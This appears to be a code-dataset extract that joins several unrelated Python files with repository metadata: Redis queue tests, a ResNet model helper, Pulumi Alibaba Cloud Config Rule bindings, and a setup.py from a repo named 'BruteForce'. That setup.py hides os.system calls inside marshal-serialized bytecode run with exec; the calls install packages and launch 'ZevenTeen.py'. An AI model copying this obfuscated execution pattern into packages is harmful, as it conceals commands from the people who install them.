self.assertEqual(response['job_id'], job_id_2)
self.assertEqual(response['payload'], self._test_payload_2)
def test_clear_queue_without_purge(self):
job_id = self._get_job_id()
queue_response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
queue_clear_response = self.queue.clear_queue(
queue_type=self._test_queue_type,
queue_id=self._test_queue_id)
# check the responses
self.assertEqual(queue_clear_response['status'], 'success')
self.assertEqual(queue_clear_response['message'], 'successfully removed all queued calls')
# check in Redis
job_queue_list = '%s:%s:%s' % (self.queue._key_prefix,
self._test_queue_type, self._test_queue_id)
primary_set = '%s:%s' % (self.queue._key_prefix, self._test_queue_type)
primary_sorted_key = self.queue._r.zrange(primary_set, 0, -1)
self.assertNotIn(self._test_queue_id, primary_sorted_key)
self.assertFalse(self.queue._r.exists(job_queue_list))
def test_clear_queue_with_purge(self):
job_id = self._get_job_id()
queue_response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
queue_clear_response = self.queue.clear_queue(
queue_type=self._test_queue_type,
queue_id=self._test_queue_id,
purge_all=True)
# check the responses
self.assertEqual(queue_clear_response['status'], 'success')
self.assertEqual(queue_clear_response['message'],
'successfully removed all queued calls and purged related resources')
# check in Redis that the related resources were removed
job_queue_list = '%s:%s:%s' % (self.queue._key_prefix,
self._test_queue_type, self._test_queue_id)
primary_set = '%s:%s' % (self.queue._key_prefix, self._test_queue_type)
payload_hashset = '%s:payload' % (self.queue._key_prefix)
job_payload_key = '%s:%s:%s' % (self._test_queue_type, self._test_queue_id, job_id)
interval_set = '%s:interval' % (self.queue._key_prefix)
job_interval_key = '%s:%s' % (self._test_queue_type, self._test_queue_id)
primary_sorted_key = self.queue._r.zrange(primary_set, 0, -1)
self.assertNotIn(self._test_queue_id, primary_sorted_key)
self.assertFalse(self.queue._r.hexists(payload_hashset, job_payload_key))
self.assertFalse(self.queue._r.hexists(interval_set, job_interval_key))
self.assertFalse(self.queue._r.exists(job_queue_list))
def test_clear_queue_with_non_existing_queue_id(self):
queue_clear_response = self.queue.clear_queue(
queue_type=self._test2_queue_type,
queue_id=self._test2_queue_id)
# check the responses
self.assertEqual(queue_clear_response['status'], 'failure')
self.assertEqual(queue_clear_response['message'],
'No queued calls found')
def test_clear_queue_with_non_existing_queue_id_with_purge(self):
queue_clear_response = self.queue.clear_queue(
queue_type=self._test2_queue_type,
queue_id=self._test2_queue_id,
purge_all=True)
# check the responses
self.assertEqual(queue_clear_response['status'], 'failure')
self.assertEqual(queue_clear_response['message'],
'No queued calls found')
def tearDown(self):
# flush all the keys in the test db after each test
self.queue._r.flushdb()
def main():
unittest.main()
if __name__ == '__main__':
main()
a505024481f7c998999228b1880061fc9d7e50d7 | 741 | py | Python | setup.py | ZevenTeen022/BruteForce | 27139e85e5374f8122fa9f3abc0f4f1d62ecf42b | [
"Apache-2.0"
] | 1 | 2019-09-27T09:18:15.000Z | 2019-09-27T09:18:15.000Z | setup.py | ZevenTeen022/BruteForce | 27139e85e5374f8122fa9f3abc0f4f1d62ecf42b | [
"Apache-2.0"
] | null | null | null | setup.py | ZevenTeen022/BruteForce | 27139e85e5374f8122fa9f3abc0f4f1d62ecf42b | [
"Apache-2.0"
] | null | null | null | import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00sD\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01e\x00\x00j\x01\x00d\x03\x00\x83\x01\x00\x01e\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01e\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01d\x01\x00S(\x06\x00\x00\x00i\xff\xff\xff\xffNs\x18\x00\x00\x00pkg update && upgrade -ys\x16\x00\x00\x00pkg install python2 -ys\x15\x00\x00\x00pip install mechanizes\x14\x00\x00\x00python2 ZevenTeen.py(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x08\x00\x00\x00\x0c\x00\r\x00\r\x00\r\x00'))
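For readability: the marshal blob in the setup.py above deserializes to a Python 2 code object whose constant pool and name table make the behavior plain. A minimal sketch of the equivalent script follows; the command strings are taken verbatim from the serialized constants, and the original invokes `os.system` on each (printed here instead, so the sketch has no side effects):

```python
# Decoded equivalent of the obfuscated setup.py above (assumption: the
# payload is Python 2 bytecode; the command strings below appear verbatim
# in its constant pool, and its name table references os.system).
commands = [
    'pkg update && upgrade -y',
    'pkg install python2 -y',
    'pip install mechanize',
    'python2 ZevenTeen.py',
]

# The original runs each command via os.system; print instead of executing.
for cmd in commands:
    print(cmd)
```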
a50b0f7a196d83e4ab0df7fe04f01b4abdccbedd | 72 | py | Python | projectile/uploader/__init__.py | Vayel/projectile | f9a7cba9cc1f07f1e6ea8aad9e7567e0a3ba03e7 | [
"MIT"
] | null | null | null | projectile/uploader/__init__.py | Vayel/projectile | f9a7cba9cc1f07f1e6ea8aad9e7567e0a3ba03e7 | [
"MIT"
] | 9 | 2016-12-28T20:36:57.000Z | 2017-01-04T15:29:41.000Z | projectile/uploader/__init__.py | Vayel/projectile | f9a7cba9cc1f07f1e6ea8aad9e7567e0a3ba03e7 | [
"MIT"
] | null | null | null | from .document_uploader import *
from .drive_document_uploader import *
| 24 | 38 | 0.833333 | 9 | 72 | 6.333333 | 0.555556 | 0.561404 | 0.77193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 72 | 2 | 39 | 36 | 0.890625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
eb5a839d7c27150ed47270eee50c92e00fe6a6e8 | 159 | py | Python | sodium/tsai_model/s12.py | Keerthi001/PySodium | 761598d8a129ce95a42404898b7f16ddcae568d9 | [
"MIT"
] | 3 | 2020-04-04T20:22:15.000Z | 2021-02-11T13:13:14.000Z | sodium/tsai_model/s12.py | Keerthi001/PySodium | 761598d8a129ce95a42404898b7f16ddcae568d9 | [
"MIT"
] | 1 | 2020-07-01T14:14:50.000Z | 2020-07-01T16:04:13.000Z | sodium/tsai_model/s12.py | Keerthi001/PySodium | 761598d8a129ce95a42404898b7f16ddcae568d9 | [
"MIT"
] | null | null | null | from sodium.model import ResNet
from sodium.model import BasicBlock
def TinyImageNetS12Model():
return ResNet(BasicBlock, [2, 2, 2, 2], num_classes=200)
| 22.714286 | 60 | 0.761006 | 22 | 159 | 5.454545 | 0.590909 | 0.05 | 0.25 | 0.35 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066176 | 0.144654 | 159 | 6 | 61 | 26.5 | 0.816176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 9 |
ebc26066bb623ee13b39d0e66d83a4ae27139f59 | 61,142 | py | Python | sdk/python/pulumi_alicloud/cfg/rule.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/cfg/rule.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/cfg/rule.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['RuleArgs', 'Rule']
@pulumi.input_type
class RuleArgs:
def __init__(__self__, *,
risk_level: pulumi.Input[int],
rule_name: pulumi.Input[str],
source_identifier: pulumi.Input[str],
source_owner: pulumi.Input[str],
config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Rule resource.
:param pulumi.Input[int] risk_level: The risk level of the Config Rule. Valid values: `1`: Critical ,`2`: Warning , `3`: Info.
:param pulumi.Input[str] rule_name: The name of the Config Rule.
:param pulumi.Input[str] source_identifier: The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
:param pulumi.Input[str] source_owner: Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
:param pulumi.Input[str] config_rule_trigger_types: The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
:param pulumi.Input[str] description: The description of the Config Rule.
:param pulumi.Input[str] exclude_resource_ids_scope: The rule monitors excluded resource IDs, multiple of which are separated by commas, only applies to rules created based on managed rules, custom rule this field is empty.
:param pulumi.Input[Mapping[str, Any]] input_parameters: Threshold value for managed rule triggering.
:param pulumi.Input[str] maximum_execution_frequency: The frequency of the compliance evaluations, it is required if the ConfigRuleTriggerTypes value is ScheduledNotification. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
:param pulumi.Input[str] region_ids_scope: The rule monitors region IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[str] resource_group_ids_scope: The rule monitors resource group IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types_scopes: Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_compliance_resource_types: Field `scope_compliance_resource_types` has been deprecated from provider version 1.124.1. New field `resource_types_scope` instead.
:param pulumi.Input[str] source_detail_message_type: Field `source_detail_message_type` has been deprecated from provider version 1.124.1. New field `config_rule_trigger_types` instead.
:param pulumi.Input[str] source_maximum_execution_frequency: Field `source_maximum_execution_frequency` has been deprecated from provider version 1.124.1. New field `maximum_execution_frequency` instead.
:param pulumi.Input[str] tag_key_scope: The rule monitors the tag key, only applies to rules created based on managed rules.
:param pulumi.Input[str] tag_value_scope: The rule monitors the tag value, use with the TagKeyScope options. only applies to rules created based on managed rules.
"""
pulumi.set(__self__, "risk_level", risk_level)
pulumi.set(__self__, "rule_name", rule_name)
pulumi.set(__self__, "source_identifier", source_identifier)
pulumi.set(__self__, "source_owner", source_owner)
if config_rule_trigger_types is not None:
pulumi.set(__self__, "config_rule_trigger_types", config_rule_trigger_types)
if description is not None:
pulumi.set(__self__, "description", description)
if exclude_resource_ids_scope is not None:
pulumi.set(__self__, "exclude_resource_ids_scope", exclude_resource_ids_scope)
if input_parameters is not None:
pulumi.set(__self__, "input_parameters", input_parameters)
if maximum_execution_frequency is not None:
pulumi.set(__self__, "maximum_execution_frequency", maximum_execution_frequency)
if region_ids_scope is not None:
pulumi.set(__self__, "region_ids_scope", region_ids_scope)
if resource_group_ids_scope is not None:
pulumi.set(__self__, "resource_group_ids_scope", resource_group_ids_scope)
if resource_types_scopes is not None:
pulumi.set(__self__, "resource_types_scopes", resource_types_scopes)
if scope_compliance_resource_types is not None:
warnings.warn("""Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""", DeprecationWarning)
pulumi.log.warn("""scope_compliance_resource_types is deprecated: Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""")
if scope_compliance_resource_types is not None:
pulumi.set(__self__, "scope_compliance_resource_types", scope_compliance_resource_types)
if source_detail_message_type is not None:
warnings.warn("""Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""", DeprecationWarning)
pulumi.log.warn("""source_detail_message_type is deprecated: Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""")
if source_detail_message_type is not None:
pulumi.set(__self__, "source_detail_message_type", source_detail_message_type)
if source_maximum_execution_frequency is not None:
warnings.warn("""Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""", DeprecationWarning)
pulumi.log.warn("""source_maximum_execution_frequency is deprecated: Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""")
if source_maximum_execution_frequency is not None:
pulumi.set(__self__, "source_maximum_execution_frequency", source_maximum_execution_frequency)
if tag_key_scope is not None:
pulumi.set(__self__, "tag_key_scope", tag_key_scope)
if tag_value_scope is not None:
pulumi.set(__self__, "tag_value_scope", tag_value_scope)
@property
@pulumi.getter(name="riskLevel")
def risk_level(self) -> pulumi.Input[int]:
"""
The risk level of the Config Rule. Valid values: `1`: Critical ,`2`: Warning , `3`: Info.
"""
return pulumi.get(self, "risk_level")
@risk_level.setter
def risk_level(self, value: pulumi.Input[int]):
pulumi.set(self, "risk_level", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Input[str]:
"""
The name of the Config Rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: pulumi.Input[str]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter(name="sourceIdentifier")
def source_identifier(self) -> pulumi.Input[str]:
"""
The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
"""
return pulumi.get(self, "source_identifier")
@source_identifier.setter
def source_identifier(self, value: pulumi.Input[str]):
pulumi.set(self, "source_identifier", value)
@property
@pulumi.getter(name="sourceOwner")
def source_owner(self) -> pulumi.Input[str]:
"""
Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
"""
return pulumi.get(self, "source_owner")
@source_owner.setter
def source_owner(self, value: pulumi.Input[str]):
pulumi.set(self, "source_owner", value)
@property
@pulumi.getter(name="configRuleTriggerTypes")
def config_rule_trigger_types(self) -> Optional[pulumi.Input[str]]:
"""
The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
"""
return pulumi.get(self, "config_rule_trigger_types")
@config_rule_trigger_types.setter
def config_rule_trigger_types(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_rule_trigger_types", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the Config Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="excludeResourceIdsScope")
def exclude_resource_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors excluded resource IDs, multiple of which are separated by commas, only applies to rules created based on managed rules, custom rule this field is empty.
"""
return pulumi.get(self, "exclude_resource_ids_scope")
@exclude_resource_ids_scope.setter
def exclude_resource_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exclude_resource_ids_scope", value)
@property
@pulumi.getter(name="inputParameters")
def input_parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Threshold value for managed rule triggering.
"""
return pulumi.get(self, "input_parameters")
@input_parameters.setter
def input_parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "input_parameters", value)
@property
@pulumi.getter(name="maximumExecutionFrequency")
def maximum_execution_frequency(self) -> Optional[pulumi.Input[str]]:
"""
The frequency of the compliance evaluations, it is required if the ConfigRuleTriggerTypes value is ScheduledNotification. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
"""
return pulumi.get(self, "maximum_execution_frequency")
@maximum_execution_frequency.setter
def maximum_execution_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum_execution_frequency", value)
@property
@pulumi.getter(name="regionIdsScope")
def region_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors region IDs, separated by commas, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "region_ids_scope")
@region_ids_scope.setter
def region_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region_ids_scope", value)
@property
@pulumi.getter(name="resourceGroupIdsScope")
def resource_group_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors resource group IDs, separated by commas, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "resource_group_ids_scope")
@resource_group_ids_scope.setter
def resource_group_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_ids_scope", value)
@property
@pulumi.getter(name="resourceTypesScopes")
def resource_types_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
"""
return pulumi.get(self, "resource_types_scopes")
@resource_types_scopes.setter
def resource_types_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "resource_types_scopes", value)
@property
@pulumi.getter(name="scopeComplianceResourceTypes")
def scope_compliance_resource_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Field `scope_compliance_resource_types` has been deprecated from provider version 1.124.1. New field `resource_types_scope` instead.
"""
return pulumi.get(self, "scope_compliance_resource_types")
@scope_compliance_resource_types.setter
def scope_compliance_resource_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "scope_compliance_resource_types", value)
@property
@pulumi.getter(name="sourceDetailMessageType")
def source_detail_message_type(self) -> Optional[pulumi.Input[str]]:
"""
Field `source_detail_message_type` has been deprecated since provider version 1.124.1. Use the new field `config_rule_trigger_types` instead.
"""
return pulumi.get(self, "source_detail_message_type")
@source_detail_message_type.setter
def source_detail_message_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_detail_message_type", value)
@property
@pulumi.getter(name="sourceMaximumExecutionFrequency")
def source_maximum_execution_frequency(self) -> Optional[pulumi.Input[str]]:
"""
Field `source_maximum_execution_frequency` has been deprecated since provider version 1.124.1. Use the new field `maximum_execution_frequency` instead.
"""
return pulumi.get(self, "source_maximum_execution_frequency")
@source_maximum_execution_frequency.setter
def source_maximum_execution_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_maximum_execution_frequency", value)
@property
@pulumi.getter(name="tagKeyScope")
def tag_key_scope(self) -> Optional[pulumi.Input[str]]:
"""
The tag key that the rule monitors. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_key_scope")
@tag_key_scope.setter
def tag_key_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_key_scope", value)
@property
@pulumi.getter(name="tagValueScope")
def tag_value_scope(self) -> Optional[pulumi.Input[str]]:
"""
The tag value that the rule monitors; use together with `tag_key_scope`. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_value_scope")
@tag_value_scope.setter
def tag_value_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_value_scope", value)
@pulumi.input_type
class _RuleState:
def __init__(__self__, *,
config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
risk_level: Optional[pulumi.Input[int]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_identifier: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
source_owner: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Rule resources.
:param pulumi.Input[str] config_rule_trigger_types: The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
:param pulumi.Input[str] description: The description of the Config Rule.
:param pulumi.Input[str] exclude_resource_ids_scope: The resource IDs that the rule excludes from monitoring, separated by commas. Only applies to rules created based on managed rules; for custom rules this field is empty.
:param pulumi.Input[Mapping[str, Any]] input_parameters: Threshold value for managed rule triggering.
:param pulumi.Input[str] maximum_execution_frequency: The frequency of the compliance evaluations. Required if the `config_rule_trigger_types` value is `ScheduledNotification`. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
:param pulumi.Input[str] region_ids_scope: The region IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
:param pulumi.Input[str] resource_group_ids_scope: The resource group IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types_scopes: Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
:param pulumi.Input[int] risk_level: The risk level of the Config Rule. Valid values: `1`: Critical, `2`: Warning, `3`: Info.
:param pulumi.Input[str] rule_name: The name of the Config Rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_compliance_resource_types: Field `scope_compliance_resource_types` has been deprecated since provider version 1.124.1. Use the new field `resource_types_scope` instead.
:param pulumi.Input[str] source_detail_message_type: Field `source_detail_message_type` has been deprecated since provider version 1.124.1. Use the new field `config_rule_trigger_types` instead.
:param pulumi.Input[str] source_identifier: The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. For managed rules, refer to the [List of Managed Rules](https://www.alibabacloud.com/help/en/doc-detail/127404.htm).
:param pulumi.Input[str] source_maximum_execution_frequency: Field `source_maximum_execution_frequency` has been deprecated since provider version 1.124.1. Use the new field `maximum_execution_frequency` instead.
:param pulumi.Input[str] source_owner: Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
:param pulumi.Input[str] tag_key_scope: The tag key that the rule monitors. Only applies to rules created based on managed rules.
:param pulumi.Input[str] tag_value_scope: The tag value that the rule monitors; use together with `tag_key_scope`. Only applies to rules created based on managed rules.
"""
if config_rule_trigger_types is not None:
pulumi.set(__self__, "config_rule_trigger_types", config_rule_trigger_types)
if description is not None:
pulumi.set(__self__, "description", description)
if exclude_resource_ids_scope is not None:
pulumi.set(__self__, "exclude_resource_ids_scope", exclude_resource_ids_scope)
if input_parameters is not None:
pulumi.set(__self__, "input_parameters", input_parameters)
if maximum_execution_frequency is not None:
pulumi.set(__self__, "maximum_execution_frequency", maximum_execution_frequency)
if region_ids_scope is not None:
pulumi.set(__self__, "region_ids_scope", region_ids_scope)
if resource_group_ids_scope is not None:
pulumi.set(__self__, "resource_group_ids_scope", resource_group_ids_scope)
if resource_types_scopes is not None:
pulumi.set(__self__, "resource_types_scopes", resource_types_scopes)
if risk_level is not None:
pulumi.set(__self__, "risk_level", risk_level)
if rule_name is not None:
pulumi.set(__self__, "rule_name", rule_name)
if scope_compliance_resource_types is not None:
warnings.warn("""Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""", DeprecationWarning)
pulumi.log.warn("""scope_compliance_resource_types is deprecated: Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""")
if scope_compliance_resource_types is not None:
pulumi.set(__self__, "scope_compliance_resource_types", scope_compliance_resource_types)
if source_detail_message_type is not None:
warnings.warn("""Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""", DeprecationWarning)
pulumi.log.warn("""source_detail_message_type is deprecated: Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""")
if source_detail_message_type is not None:
pulumi.set(__self__, "source_detail_message_type", source_detail_message_type)
if source_identifier is not None:
pulumi.set(__self__, "source_identifier", source_identifier)
if source_maximum_execution_frequency is not None:
warnings.warn("""Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""", DeprecationWarning)
pulumi.log.warn("""source_maximum_execution_frequency is deprecated: Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""")
if source_maximum_execution_frequency is not None:
pulumi.set(__self__, "source_maximum_execution_frequency", source_maximum_execution_frequency)
if source_owner is not None:
pulumi.set(__self__, "source_owner", source_owner)
if status is not None:
pulumi.set(__self__, "status", status)
if tag_key_scope is not None:
pulumi.set(__self__, "tag_key_scope", tag_key_scope)
if tag_value_scope is not None:
pulumi.set(__self__, "tag_value_scope", tag_value_scope)
@property
@pulumi.getter(name="configRuleTriggerTypes")
def config_rule_trigger_types(self) -> Optional[pulumi.Input[str]]:
"""
The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
"""
return pulumi.get(self, "config_rule_trigger_types")
@config_rule_trigger_types.setter
def config_rule_trigger_types(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_rule_trigger_types", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the Config Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="excludeResourceIdsScope")
def exclude_resource_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The resource IDs that the rule excludes from monitoring, separated by commas. Only applies to rules created based on managed rules; for custom rules this field is empty.
"""
return pulumi.get(self, "exclude_resource_ids_scope")
@exclude_resource_ids_scope.setter
def exclude_resource_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exclude_resource_ids_scope", value)
@property
@pulumi.getter(name="inputParameters")
def input_parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Threshold value for managed rule triggering.
"""
return pulumi.get(self, "input_parameters")
@input_parameters.setter
def input_parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "input_parameters", value)
@property
@pulumi.getter(name="maximumExecutionFrequency")
def maximum_execution_frequency(self) -> Optional[pulumi.Input[str]]:
"""
The frequency of the compliance evaluations. Required if the `config_rule_trigger_types` value is `ScheduledNotification`. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
"""
return pulumi.get(self, "maximum_execution_frequency")
@maximum_execution_frequency.setter
def maximum_execution_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum_execution_frequency", value)
@property
@pulumi.getter(name="regionIdsScope")
def region_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
